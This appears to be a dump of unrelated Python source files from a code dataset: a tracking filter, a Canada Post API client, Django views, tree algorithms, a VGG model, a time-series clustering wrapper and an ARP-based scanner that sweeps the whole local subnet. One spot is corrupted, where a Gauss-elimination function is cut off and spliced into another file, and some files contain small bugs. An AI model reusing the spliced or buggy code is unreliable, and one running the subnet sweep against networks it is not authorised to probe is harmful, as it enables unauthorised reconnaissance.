comp in pruned_gm]) \n# print '++merge:', allid\n allid = np.array([comp.weight for comp in pruned_gm]) \n# print '++w:', allid \n #print self.gm\n ''' \n self.gm = pruned_gm\n\n def detect(self):\n for i, comp in enumerate(self.gm):\n if not comp.detect:\n if comp.weight > self.det1:\n self.gm[i].detect = True\n\n if comp.detect:\n if comp.weight < self.det2:\n self.gm[i].detect = False\n \n \n def create_birth(self, measures):\n #sigma_r = 10/3#2.0/3\n #R = [[math.pow(2*sigma_r, 2), 0], [0, math.pow(2*sigma_r, 2)]]\n #sigma_q = 0.25#1e-3 \n #Q = [[math.pow(sigma_q, 2), 0, 0, 0], [0, math.pow(sigma_q, 2), 0, 0], [0, 0, 5, 0], [0, 0, 0, 5]] \n\n\n it = np.nditer(measures.shape[1])\n born = []\n if not len(self.gm):\n self.gm = [GmphdComponent(self.birth_w, measures[:,i], self.initQ, 2) for i in np.ndindex(measures.shape[1])]\n \n #print 'GM', self.gm \n #print 'measure', measures \n for i in np.ndindex(measures.shape[1]):\n #born.append(GmphdComponent(GMPHD.birth_w, measures[:,i], Q))\n mindist = 10\n z = measures[:,i]\n for j, comp in enumerate(self.gm):\n #print 'comp', comp\n if np.linalg.norm(z[:2]-comp.mean[:2]) < mindist: \n mindist = np.linalg.norm(z[:2]-comp.mean[:2])\n \n if mindist > 0.6:\n allid = np.array([comp.id for comp in self.gm])\n #print 'allid', allid\n newid = 1\n for ind in range(max(allid)+4):\n if min(abs(allid - ind)-1) > 0:\n newid = ind\n break\n #print 'newid', newid\n #born.append(GmphdComponent(self.birth_w, measures[:,i], self.initQ, newid)) \n self.gm.append(GmphdComponent(self.birth_w, measures[:,i], self.initQ, newid))\n #print '----new born', self.gm[-1]\n \n #self.gm.extend(born)\n \n allid = np.array([comp.id for comp in self.gm])\n #print '++birth', allid\n \n return self.gm\n\n","sub_path":"src/sp_hl_hd_op/convertwhere/gmphd4.py","file_name":"gmphd4.py","file_ext":"py","file_size_in_byte":14345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"221718119","text":"from .base import BaseApi, method\nfrom ..https import Methods\nfrom ..objects.price_quotes import PriceQuotes\nfrom ..objects.services import Services\nfrom ..objects.service import Service\nfrom ..objects.option import Option\n\n\nclass Rating(BaseApi):\n\n @method(\n '/rs/ship/price',\n 'application/vnd.cpc.ship.rate-v4+xml',\n xmlns='http://www.canadapost.ca/ws/ship/rate-v4',\n method=Methods.POST\n )\n def get_rates(self, data, ns):\n node = self.parse_xml(data)\n return PriceQuotes.from_xml(node)\n\n @method(\n '/rs/ship/service',\n # 'application/vnd.cpc.ship.rate-v4+xml',\n xmlns='http://www.canadapost.ca/ws/ship/rate-v4',\n headers={\n \"Accept\": \"application/vnd.cpc.ship.rate-v4+xml\"\n },\n method=Methods.GET,\n )\n def get_services(self, data, ns):\n node = self.parse_xml(data)\n return Services.from_xml(node)\n\n @method(\n '/rs/ship/service/%(service)s',\n 'application/vnd.cpc.ship.rate-v4+xml',\n xmlns='application/vnd.cpc.ship.rate-v4+xml',\n method=Methods.GET\n )\n def get_service(self, data, ns):\n node = self.parse_xml(data)\n return Service.from_xml(node)\n\n @method(\n '/rs/ship/option/%(option)s',\n 'application/vnd.cpc.ship.rate-v4+xml',\n xmlns='application/vnd.cpc.ship.rate-v4+xml',\n method=Methods.GET\n )\n def get_option(self, data, ns):\n node = self.parse_xml(data)\n return Option.from_xml(node)\n","sub_path":"src/canadapost/api/rating.py","file_name":"rating.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"242683504","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom .models import Periodista\nfrom .forms import ObjetoForm\n\n\n# Create your views here.\ndef Inicio(request):\n return render(request,'Inicio.html')\n\n\ndef Lista(request):\n periodistas = Periodista.objects.all()\n return render(request,'Lista.html', context={'periodistas': periodistas},)\n\ndef form_objeto(request):\n if request.method == \"POST\":\n objeto_form = ObjetoForm(request.POST,request.FILES)\n if objeto_form.is_valid():\n post = objeto_form.save(commit=False)\n post.save()\n return redirect('Lista')\n else:\n objeto_form = ObjetoForm()\n return render(request, 'core/form_objeto.html', {'objeto_form': objeto_form})\n\ndef mod_objeto(request, pk):\n post = get_object_or_404(Periodista, pk=pk)\n if request.method == \"POST\":\n objeto_form = ObjetoForm(request.POST, request.FILES, instance=post)\n if objeto_form.is_valid():\n post = objeto_form.save()\n post.save()\n return redirect('Lista')\n else:\n objeto_form = ObjetoForm(instance=post)\n return render(request, 'core/mod_objeto.html', {'objeto_form': objeto_form})\n\ndef delete_objeto(request, pk):\n objeto = Periodista.objects.get(pk=pk)\n objeto.delete()\n return redirect('Lista')\n","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"490504175","text":"def find_p(A,i,NROW):\n\tmaxest=0\n\tn=len(A[0])-1\n\tfor j in range(i,n+1,1):\n\t\ttemp=NROW[j]\n\t\tif maxest= 2:\n self.ans = current_node\n\n # Return True if either of the three bool values is True.\n return mid or left or right\n\n # Traverse the tree\n recurse_tree(root)\n return self.ans\n\n\nclass Solution2:\n\n def lowestCommonAncestor(self, root, p, q):\n \"\"\"\n :type root: TreeNode\n :type p: TreeNode\n :type q: TreeNode\n :rtype: TreeNode\n \"\"\"\n\n # Stack for tree traversal\n stack = [root]\n\n # Dictionary for parent pointers\n parent = {root: None}\n\n # Iterate until we find both the nodes p and q\n while p not in parent or q not in parent:\n\n node = stack.pop()\n\n # While traversing the tree, keep saving the parent pointers.\n if node.left:\n parent[node.left] = node\n stack.append(node.left)\n if node.right:\n parent[node.right] = node\n stack.append(node.right)\n\n # Ancestors set() for node p.\n ancestors = set()\n\n # Process all ancestors for node p using parent pointers.\n while p:\n ancestors.add(p)\n p = parent[p]\n\n # The first ancestor of q which appears in\n # p's ancestor set() is their lowest common ancestor.\n while q not in ancestors:\n q = parent[q]\n return q\n","sub_path":"codes/Aiamjay/Week2-Day2/236. Lowest Common Ancestor of a Binary Tree.py","file_name":"236. Lowest Common Ancestor of a Binary Tree.py","file_ext":"py","file_size_in_byte":3366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"500365461","text":"from processor.engine.app import create_app\n\n\nrun_app = create_app()\nwith run_app.app_context():\n from processor.controllers import *\n\n\nif __name__ == \"__main__\":\n run_app.run(\n host=\"0.0.0.0\",\n port=2525,\n debug=True,\n threaded=True\n )\n","sub_path":"image_processor_final/image_processor/initate_app.py","file_name":"initate_app.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"279953850","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom oslo_policy import policy\n\nfrom keystone.common.policies import base\n\ndomain_policies = [\n policy.DocumentedRuleDefault(\n name=base.IDENTITY % 'get_domain',\n check_str=base.RULE_ADMIN_OR_TARGET_DOMAIN,\n description='Show domain details.',\n operations=[{'path': '/v3/domains/{domain_id}',\n 'method': 'GET'}]),\n policy.DocumentedRuleDefault(\n name=base.IDENTITY % 'list_domains',\n check_str=base.RULE_ADMIN_REQUIRED,\n description='List domains.',\n operations=[{'path': '/v3/domains',\n 'method': 'GET'}]),\n policy.DocumentedRuleDefault(\n name=base.IDENTITY % 'create_domain',\n check_str=base.RULE_ADMIN_REQUIRED,\n description='Create domain.',\n operations=[{'path': '/v3/domains',\n 'method': 'POST'}]),\n policy.DocumentedRuleDefault(\n name=base.IDENTITY % 'update_domain',\n check_str=base.RULE_ADMIN_REQUIRED,\n description='Update domain.',\n operations=[{'path': '/v3/domains/{domain_id}',\n 'method': 'PATCH'}]),\n policy.DocumentedRuleDefault(\n name=base.IDENTITY % 'delete_domain',\n check_str=base.RULE_ADMIN_REQUIRED,\n description='Delete domain.',\n operations=[{'path': '/v3/domains/{domain_id}',\n 'method': 'DELETE'}])\n]\n\n\ndef list_rules():\n return domain_policies\n","sub_path":"keystone/common/policies/domain.py","file_name":"domain.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"438940478","text":"import re\n\nfrom django.core import validators\nfrom django.core.exceptions import ValidationError\nfrom django.utils.deconstruct import deconstructible\nfrom django.utils.translation import gettext_lazy as _\n\n\n@deconstructible\nclass UsernameValidator(validators.RegexValidator):\n regex = r'^[\\w.-]+$'\n message = _(\n 'Enter a valid username. This value may contain only letters, '\n 'numbers, and @/./+/-/_ characters.'\n )\n flags = 0\n\n\n@deconstructible\nclass PhoneNumberValidator(validators.RegexValidator):\n regex = r'^\\+?1?\\d{9,15}$'\n message = _(\n \"Phone number must be entered in the format: '+999999999'. Up to 15 digits allowed.\"\n )\n flags = 0\n","sub_path":"django-project/lean_auth/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"593835938","text":"import arppy as arppy\nimport comms as comms\nimport time as time\nimport json as json\n\nimport const as c\nimport devicetable as devtbl\n\n\nclass SmartARPListener(arppy.ARPListener):\n\n def __init__(self, sys_settings_fname=None):\n super().__init__(sys_settings_fname)\n self.comms = comms.Comms(sys_settings_fname)\n\n def smart_arp_listen_routine(self):\n # Get an ethernet packet\n self.recv_ethernet_packet()\n\n # Send out arp data if it was an arp packet and not a broadcast\n # from the device running this code\n if self.is_arp_packet() and not self.is_known_broadcast():\n self.unpack_eth_payload_into_arp_data()\n self.comms.send_msg('new_arp_pkt', self.get_styled_arp_data())\n\n def is_known_broadcast(self):\n dst_mac = self.ethernet_data['dest_mac_as_bytes']\n cond1 = dst_mac == c.arp_broadcast_eth_dest_mac\n\n src_mac = self.ethernet_data['src_mac_as_bytes']\n cond2 = src_mac == self.net_interface.get_interface_mac()\n\n return cond1 and cond2\n\n def clean_up(self):\n super().clean_up()\n self.comms.close_pub_sub()\n\n\nclass SmartARPSender(arppy.ARPSender):\n\n def __init__(self, sys_settings_fname, device_table_fname):\n super().__init__(sys_settings_fname)\n self.device_table_fname = device_table_fname\n self.sub_list = [b'new_table']\n self.comms = comms.Comms(sys_settings_fname)\n self.comms.set_subscriptions(self.sub_list)\n\n self.device_list = devtbl.load_device_table(device_table_fname)\n self.device_lut = devtbl.update_device_lut(self.device_list)\n\n self.setup_broadcast_and_direct_intervals(sys_settings_fname)\n\n self.prev_broadcast_t = 0\n self.prev_direct_arp_t = 0\n\n def setup_broadcast_and_direct_intervals(self, sys_settings_fname):\n with open(sys_settings_fname, 'r') as f:\n self.sys_settings = json.load(f)\n\n self.broadcast_interval_s = max(\n self.sys_settings['broadcast_interval_s'],\n 10\n )\n num_direct = self.sys_settings['num_direct_msgs_between_broadcast']\n self.direct_interval_s = max(\n self.broadcast_interval_s / (num_direct + 1),\n 5\n )\n\n def smart_arp_send_routine(self):\n cur_time = time.time()\n\n # Periodically send a broadcast to update IPs\n # and find new MACs\n if cur_time - self.prev_broadcast_t > self.broadcast_interval_s:\n # print('broadcast', cur_time)\n self.prev_broadcast_t = cur_time\n self.send_broadcast()\n\n # Periodically send direct arp requests to\n # each mac/ip pair in the table\n if (cur_time - self.prev_direct_arp_t > self.direct_interval_s) and \\\n (cur_time - self.prev_broadcast_t > self.direct_interval_s):\n # print('direct', cur_time)\n self.prev_direct_arp_t = cur_time\n self.send_direct()\n\n # Check for new mac tables\n msg = self.comms.recv_msg()\n if msg:\n self.replace_old_table(msg)\n\n time.sleep(0.1)\n\n def send_broadcast(self):\n ip_addr = self.net_interface.get_interface_ip('str_dots')\n ip_hdr = '.'.join(ip_addr.split('.')[:-1])\n\n for ii in range(256):\n dst_ip = ip_hdr + '.{}'.format(ii)\n self.send_arp_request(dst_ip)\n time.sleep(0.006)\n\n def send_direct(self):\n for key in self.device_lut:\n dst_mac = self.device_lut[key]['mac']\n dst_ip = self.device_lut[key]['ip']\n self.send_arp_request(dst_ip, dst_mac)\n time.sleep(0.006)\n\n def replace_old_table(self, msg):\n self.device_list = json.loads(msg[1].decode('utf-8'))\n self.device_lut = devtbl.update_device_lut(self.device_list)\n\n def clean_up(self):\n super().clean_up()\n self.comms.close_pub_sub()\n\n\nif __name__ == '__main__':\n import sys\n sys_settings_fname = 'sys_settings.json'\n device_table_fname = 'device_table.json'\n\n if 'listen' in sys.argv:\n listener = SmartARPListener(sys_settings_fname)\n\n is_running = True\n print('Starting arp listener...')\n while is_running:\n try:\n listener.smart_arp_listen_routine()\n except KeyboardInterrupt:\n print('closing arp listener')\n is_running = False\n listener.clean_up()\n elif 'send' in sys.argv:\n sender = SmartARPSender(sys_settings_fname, device_table_fname)\n\n is_running = True\n print('Starting arp sender...')\n while is_running:\n try:\n sender.smart_arp_send_routine()\n except KeyboardInterrupt:\n print('Closing arp sender')\n is_running = False\n sender.clean_up()\n","sub_path":"homenet/smartarp.py","file_name":"smartarp.py","file_ext":"py","file_size_in_byte":4861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"38131066","text":"import sys\nimport os.path\nimport numpy as np\nimport pandas\n\nfrom Sloth import Sloth\nfrom tslearn.datasets import CachedDatasets\n\nfrom d3m.primitive_interfaces.transformer import TransformerPrimitiveBase\nfrom d3m.primitive_interfaces.base import CallResult\n\nfrom d3m import container, utils\nfrom d3m.container import DataFrame as d3m_DataFrame\nfrom d3m.metadata import hyperparams, base as metadata_base\nfrom d3m.primitives.datasets import DatasetToDataFrame\nfrom common_primitives import utils as utils_cp\n\nfrom timeseriesloader.timeseries_loader import TimeSeriesLoaderPrimitive\n\n__author__ = 'Distil'\n__version__ = '2.0.1'\n\nInputs = container.pandas.DataFrame\nOutputs = container.pandas.DataFrame\n\nclass Hyperparams(hyperparams.Hyperparams):\n algorithm = hyperparams.Enumeration(default = 'GlobalAlignmentKernelKMeans', \n semantic_types = ['https://metadata.datadrivendiscovery.org/types/ControlParameter'],\n values = ['GlobalAlignmentKernelKMeans', 'TimeSeriesKMeans', 'DBSCAN', 'HDBSCAN'],\n description = 'type of clustering algorithm to use')\n nclusters = hyperparams.UniformInt(lower=1, upper=sys.maxsize, default=3, semantic_types=\n ['https://metadata.datadrivendiscovery.org/types/TuningParameter'], description = 'number of clusters \\\n to user in kernel kmeans algorithm')\n eps = hyperparams.Uniform(lower=0, upper=sys.maxsize, default = 0.5, semantic_types = \n ['https://metadata.datadrivendiscovery.org/types/TuningParameter'], \n description = 'maximum distance between two samples for them to be considered as in the same neigborhood, \\\n used in DBSCAN algorithm')\n min_samples = hyperparams.UniformInt(lower=1, upper=sys.maxsize, default = 5, semantic_types = \n ['https://metadata.datadrivendiscovery.org/types/TuningParameter'], \n description = 'number of samples in a neighborhood for a point to be considered as a core point, \\\n used in DBSCAN and HDBSCAN algorithms') \n pass\n\nclass Storc(TransformerPrimitiveBase[Inputs, Outputs, Hyperparams]):\n \"\"\"\n Produce primitive's best guess for the cluster number of each series.\n \"\"\"\n metadata = metadata_base.PrimitiveMetadata({\n # Simply an UUID generated once and fixed forever. Generated using \"uuid.uuid4()\".\n 'id': \"77bf4b92-2faa-3e38-bb7e-804131243a7f\",\n 'version': __version__,\n 'name': \"Sloth\",\n # Keywords do not have a controlled vocabulary. Authors can put here whatever they find suitable.\n 'keywords': ['Time Series','Clustering'],\n 'source': {\n 'name': __author__,\n 'uris': [\n # Unstructured URIs.\n \"https://github.com/NewKnowledge/sloth-d3m-wrapper\",\n ],\n },\n # A list of dependencies in order. These can be Python packages, system packages, or Docker images.\n # Of course Python packages can also have their own dependencies, but sometimes it is necessary to\n # install a Python package first to be even able to run setup.py of another package. Or you have\n # a dependency which is not on PyPi.\n 'installation': [{\n 'type': metadata_base.PrimitiveInstallationType.PIP,\n 'package': 'cython',\n 'version': '0.28.5',\n },{\n 'type': metadata_base.PrimitiveInstallationType.PIP,\n 'package_uri': 'git+https://github.com/NewKnowledge/sloth-d3m-wrapper.git@{git_commit}#egg=SlothD3MWrapper'.format(\n git_commit=utils.current_git_commit(os.path.dirname(__file__)),\n ),\n }],\n # The same path the primitive is registered with entry points in setup.py.\n 'python_path': 'd3m.primitives.distil.Sloth.cluster',\n # Choose these from a controlled vocabulary in the schema. If anything is missing which would\n # best describe the primitive, make a merge request.\n 'algorithm_types': [\n metadata_base.PrimitiveAlgorithmType.SPECTRAL_CLUSTERING,\n ],\n 'primitive_family': metadata_base.PrimitiveFamily.TIME_SERIES_SEGMENTATION,\n })\n\n def __init__(self, *, hyperparams: Hyperparams, random_seed: int = 0)-> None:\n super().__init__(hyperparams=hyperparams, random_seed=random_seed)\n\n def produce(self, *, inputs: Inputs, timeout: float = None, iterations: int = None) -> CallResult[Outputs]:\n \"\"\"\n Parameters\n ----------\n inputs : Input pandas frame where each row is a series. Series timestamps are store in the column names.\n\n Returns\n -------\n Outputs\n The output is a dataframe containing a single column where each entry is the associated series' cluster number.\n \"\"\"\n # setup model up\n sloth = Sloth()\n\n # set number of clusters for k-means\n if self.hyperparams['algorithm'] == 'TimeSeriesKMeans':\n # enforce default value\n if not self.hyperparams['nclusters']:\n nclusters = 4\n else:\n nclusters = self.hyperparams['nclusters']\n labels = sloth.ClusterSeriesKMeans(inputs.values, nclusters, 'TimeSeriesKMeans')\n elif self.hyperparams['algorithm'] == 'DBSCAN':\n # enforce default value\n if not self.hyperparams['eps']:\n nclusters = 0.5\n else:\n eps = self.hyperparams['eps']\n if not self.hyperparams['min_samples']:\n min_samples = 5\n else:\n min_samples = self.hyperparams['min_samples']\n SimilarityMatrix = sloth.GenerateSimilarityMatrix(inputs.values)\n nclusters, labels, cnt = sloth.ClusterSimilarityMatrix(SimilarityMatrix, eps, min_samples)\n elif self.hyperparams['algorithm'] == 'HDBSCAN':\n # enforce default value\n if not self.hyperparams['min_samples']:\n min_samples = 5\n else:\n min_samples = self.hyperparams['min_samples']\n SimilarityMatrix = sloth.GenerateSimilarityMatrix(inputs.values)\n nclusters, labels, cnt = sloth.HClusterSimilarityMatrix(SimilarityMatrix, min_samples)\n else:\n # enforce default value\n if not self.hyperparams['nclusters']:\n nclusters = 4\n else:\n nclusters = self.hyperparams['nclusters']\n labels = sloth.ClusterSeriesKMeans(inputs.values, nclusters, 'GlobalAlignmentKernelKMeans') \n\n # add metadata to output\n out_df_sloth = pandas.DataFrame(labels)\n out_df_sloth.columns = ['labels']\n\n # initialize the output dataframe as input dataframe (results will be appended to it)\n # out_df = d3m_DataFrame(inputs)\n\n sloth_df = d3m_DataFrame(out_df_sloth)\n # first column ('labels')\n col_dict = dict(sloth_df.metadata.query((metadata_base.ALL_ELEMENTS, 0)))\n col_dict['structural_type'] = type(\"1\")\n col_dict['name'] = 'labels'\n col_dict['semantic_types'] = ('http://schema.org/Integer', 'https://metadata.datadrivendiscovery.org/types/PredictedTarget')\n sloth_df.metadata = sloth_df.metadata.update((metadata_base.ALL_ELEMENTS, 0), col_dict)\n\n # concatentate final output frame -- not real consensus from program, so commenting out for now\n # out_df = utils_cp.append_columns(out_df, sloth_df)\n\n return CallResult(sloth_df)\n\nif __name__ == '__main__':\n # Load data and preprocessing\n input_dataset = container.Dataset.load('file:///data/home/jgleason/D3m/datasets/seed_datasets_current/66_chlorineConcentration/66_chlorineConcentration_dataset/datasetDoc.json')\n ds2df_client = DatasetToDataFrame(hyperparams = {\"dataframe_resource\":\"1\"})\n df = d3m_DataFrame(ds2df_client.produce(inputs = input_dataset).value) \n ts_loader = TimeSeriesLoaderPrimitive(hyperparams = {\"time_col_index\":0, \"value_col_index\":1,\"file_col_index\":1})\n metadata_dict = dict(df.metadata.query_column(ts_loader.hyperparams['file_col_index']))\n metadata_dict['semantic_types'] = ('https://metadata.datadrivendiscovery.org/types/FileName', 'https://metadata.datadrivendiscovery.org/types/Timeseries')\n metadata_dict['media_types'] = ('text/csv',)\n metadata_dict['location_base_uris'] = ('file:///data/home/jgleason/D3m/datasets/seed_datasets_current/66_chlorineConcentration/66_chlorineConcentration_dataset/timeseries/',)\n df.metadata = df.metadata.update_column(ts_loader.hyperparams['file_col_index'], metadata_dict)\n ts_values = ts_loader.produce(inputs = df)\t \n\n #storc_client = Storc(hyperparams={'algorithm':'GlobalAlignmentKernelKMeans','nclusters':4})\n storc_client = Storc(hyperparams={'algorithm':'DBSCAN','eps':0.5, 'min_samples':5})\n #frame = pandas.read_csv(\"path/csv_containing_one_series_per_row.csv\",dtype=str)\n result = storc_client.produce(inputs = ts_values.value.head(100))\n print(result.value)\n","sub_path":"SlothD3MWrapper/Storc.py","file_name":"Storc.py","file_ext":"py","file_size_in_byte":8971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"603852716","text":"from django.db import models\nfrom datetime import date, datetime\nfrom django.utils import timezone\nfrom django.db.models import Q\n\nclass AgendaCustomManager(models.Manager):\n def disponiveis(self):\n return super().get_queryset().filter(dia__gte=date.today()).order_by('dia')\n\nclass HorarioCustomManager(models.Manager):\n def disponiveis(self):\n hora_atual = timezone.localtime(timezone.now()).time()\n hora_padrao = datetime.strptime('00:00', '%H:%M')\n \n return super().get_queryset().filter(\n (\n Q(agenda__dia=date.today(), \n hora__gt= hora_atual) \n | Q(agenda__dia__gt=date.today(),\n hora__gte=hora_padrao)\n ), \n marcado=False\n ).order_by('hora')\n \n","sub_path":"backend/agenda/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"317283374","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nimport torchvision.datasets as datasets\nimport torchvision.transforms as transforms\nimport matplotlib.pyplot as plt\nimport torchvision\nfrom torchvision.utils import make_grid\n\nclass VGG(nn.Module):\n def __init__(self, in_channels = 3, hidden_channels = 64):\n super(VGG, self).__init__()\n self.conv1 = nn.Conv2d(in_channels, hidden_channels, kernel_size = 3, stride = 1, padding = 1)\n self.relu1 = nn.ReLU()\n self.conv2 = nn.Conv2d(hidden_channels, hidden_channels, kernel_size = 3, stride = 1, padding = 1)\n self.relu2 = nn.ReLU()\n self.maxpool1 = nn.MaxPool2d(kernel_size = 2, stride = 2)\n self.conv3 = nn.Conv2d(hidden_channels, hidden_channels*2, kernel_size = 3, stride = 1, padding = 1)\n self.relu3 = nn.ReLU()\n self.conv4 = nn.Conv2d(hidden_channels*2, hidden_channels*2, kernel_size = 3, stride = 1, padding = 1)\n self.relu4 = nn.ReLU()\n self.maxpool2 = nn.MaxPool2d(kernel_size = 2, stride = 2)\n self.conv5 = nn.Conv2d(hidden_channels*2, hidden_channels*4, kernel_size = 3, stride = 1, padding = 1)\n self.relu5 = nn.ReLU()\n self.conv6 = nn.Conv2d(hidden_channels*4, hidden_channels*4, kernel_size = 3, stride = 1, padding = 1)\n self.relu6 = nn.ReLU()\n self.conv7 = nn.Conv2d(hidden_channels*4, hidden_channels*4, kernel_size = 3, stride = 1, padding = 1)\n self.relu7 = nn.ReLU()\n self.maxpool3 = nn.MaxPool2d(kernel_size = 2, stride = 2)\n self.conv8 = nn.Conv2d(hidden_channels*4, hidden_channels*8, kernel_size = 3, stride = 1, padding = 1)\n self.relu8 = nn.ReLU()\n self.conv9 = nn.Conv2d(hidden_channels*8, hidden_channels*8, kernel_size = 3, stride = 1, padding = 1)\n self.relu9 = nn.ReLU()\n self.conv10 = nn.Conv2d(hidden_channels*8, hidden_channels*8, kernel_size = 3, stride = 1, padding = 1)\n self.relu10 = nn.ReLU()\n self.maxpool4 = nn.MaxPool2d(kernel_size = 2, stride = 2)\n self.conv11 = nn.Conv2d(hidden_channels*8, hidden_channels*8, kernel_size = 3, stride = 1, padding = 1)\n self.relu11 = nn.ReLU()\n self.conv12 = nn.Conv2d(hidden_channels*8, hidden_channels*8, kernel_size = 3, stride = 1, padding = 1)\n self.relu12 = nn.ReLU()\n self.conv13 = nn.Conv2d(hidden_channels*8, hidden_channels*8, kernel_size = 3, stride = 1, padding = 1)\n self.relu13 = nn.ReLU()\n self.maxpool5 = nn.MaxPool2d(kernel_size = 2, stride = 2)\n self.linear1 = nn.Linear(512*7*7, 4096)\n self.relu14 = nn.ReLU()\n self.dropout1 = nn.Dropout(0.5)\n self.linear2 = nn.Linear(4096, 4096)\n self.relu15 = nn.ReLU()\n self.dropout2 = nn.Dropout(0.5)\n self.linear3 = nn.Linear(4096, 1000)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.relu1(x)\n x = self.conv2(x)\n x = self.relu2(x)\n x = self.maxpool1(x)\n x = self.conv3(x)\n x = self.relu3(x)\n x = self.conv4(x)\n x = self.relu4(x)\n x = self.maxpool2(x) \n x = self.conv5(x)\n x = self.relu5(x)\n x = self.conv6(x)\n x = self.relu6(x)\n x = self.conv7(x)\n x = self.relu7(x)\n x = self.maxpool3(x) \n x = self.conv8(x)\n x = self.relu8(x)\n x = self.conv9(x)\n x = self.relu9(x)\n x = self.conv10(x)\n x = self.relu10(x)\n x = self.maxpool4(x) \n x = self.conv11(x)\n x = self.relu11(x)\n x = self.conv12(x)\n x = self.relu12(x)\n x = self.conv13(x)\n x = self.relu13(x)\n x = self.maxpool5(x)\n x = x.reshape(x.shape[0], -1)\n x = self.linear1(x)\n x = self.relu14(x)\n x = self.dropout1(x)\n x = self.linear2(x)\n x = self.relu15(x)\n x = self.dropout2(x)\n x = self.linear3(x)\n return x\n\n\nif __name__ == \"__main__\":\n device = 'cpu'\n vgg_model = VGG()\n #print(vgg_model)\n x = torch.randn(10, 3, 224, 224).to(device)\n print(vgg_model(x).shape)\n\n","sub_path":"VGG_16.py","file_name":"VGG_16.py","file_ext":"py","file_size_in_byte":4149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"308159220","text":"\nprint(\"*\\n**\\n***\\n****\\nDo you want to print this pattern\\nIf yes then enter 1 else 0\")\na=int(input())\nb=bool(a)\nprint(\"enter number of lines you want to print this pattern\")\nn=int(input())\nif(b==True):\n i=0\n while(i0):\n j=i\n while(j>0):\n print(\"*\",end=\"\")\n j-=1\n print()\n i-=1","sub_path":"pattern1.py","file_name":"pattern1.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"88541376","text":"\r\nimport tornado.web\r\n\r\nfrom abase.basehandler.handlertools import localhandlers\r\nfrom tornas import settings\r\ntemplate_path=settings.TEMPLATES_PATH,\r\nstatic_path=settings.STATIC_PATH\r\n\r\n\r\nclass Applications(tornado.web.Application):\r\n\r\n def __init__(self):\r\n handlers = localhandlers()\r\n settings = dict(\r\n template_path=template_path,\r\n static_path=static_path\r\n )\r\n\r\n tornado.web.Application.__init__(self, handlers, **settings)\r\n\r\n\r\n\r\n\r\n","sub_path":"abase/basehandler/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"619821979","text":"# compute df/f from raw F data\n#\n# Ziqiang Wei\n#\n# weiz@janelia.hhmi.org\n\nimport numpy as np\nfrom scipy.interpolate import interp1d\n\n\nskip_interval = 3.0 # ignore F after a spike (< interval_pre sec) while computing baseline\n\n\ndef get_baseline_corr_dff(fmean, spktimes, ca_time, interval=skip_interval):\n fmeanSkipSpk = np.copy(fmean)\n for n_spk in spktimes:\n skip_frame = np.logical_and(ca_time >= n_spk, ca_time <= n_spk + interval)\n fmeanSkipSpk[skip_frame] = np.nan\n frameNoSpk = np.logical_not(np.isnan(fmeanSkipSpk))\n # baseline = interp1d(ca_time[frameNoSpk], fmean[frameNoSpk], kind='linear')\n # 'cubic' interp1d behaves different in scipy from that in matlab, probably the num is different by default\n # f_baseline = baseline(ca_time)\n f_baseline = fmean[frameNoSpk].mean()\n dff = (fmean - f_baseline) / f_baseline\n return dff\n","sub_path":"get_baseline_corr_dff.py","file_name":"get_baseline_corr_dff.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"192860677","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\ndef plot_setup():\n\n # make figs directory\n if not os.path.isdir('figs'):\n os.mkdir('figs')\n \n # set plot fonts\n myfont = {'family' : 'arial',\n 'weight' : 'normal',\n 'size' : 14}\n plt.rc('font', **myfont)\n\ndef plot_eigenvalues(e,e_br=None,out_label=None):\n \n plot_setup() \n k = e.shape[0]\n if out_label is None:\n out_label = 'Output'\n \n plt.figure()\n plt.semilogy(range(1,k+1),e,'ko-')\n if e_br is not None:\n plt.fill_between(range(1,k+1),e_br[:,0],e_br[:,1],\n facecolor='0.7', interpolate=True)\n plt.xlabel('Index')\n plt.ylabel('Eigenvalues')\n plt.title(out_label)\n plt.grid(True)\n plt.xticks(range(1,k+1))\n if e_br is None:\n plt.axis([1,k,np.amin(e),np.amax(e)])\n else:\n plt.axis([1,k,np.amin(e_br[:,0]),np.amax(e_br[:,1])])\n figname = 'figs/evals_' + out_label + '.eps'\n 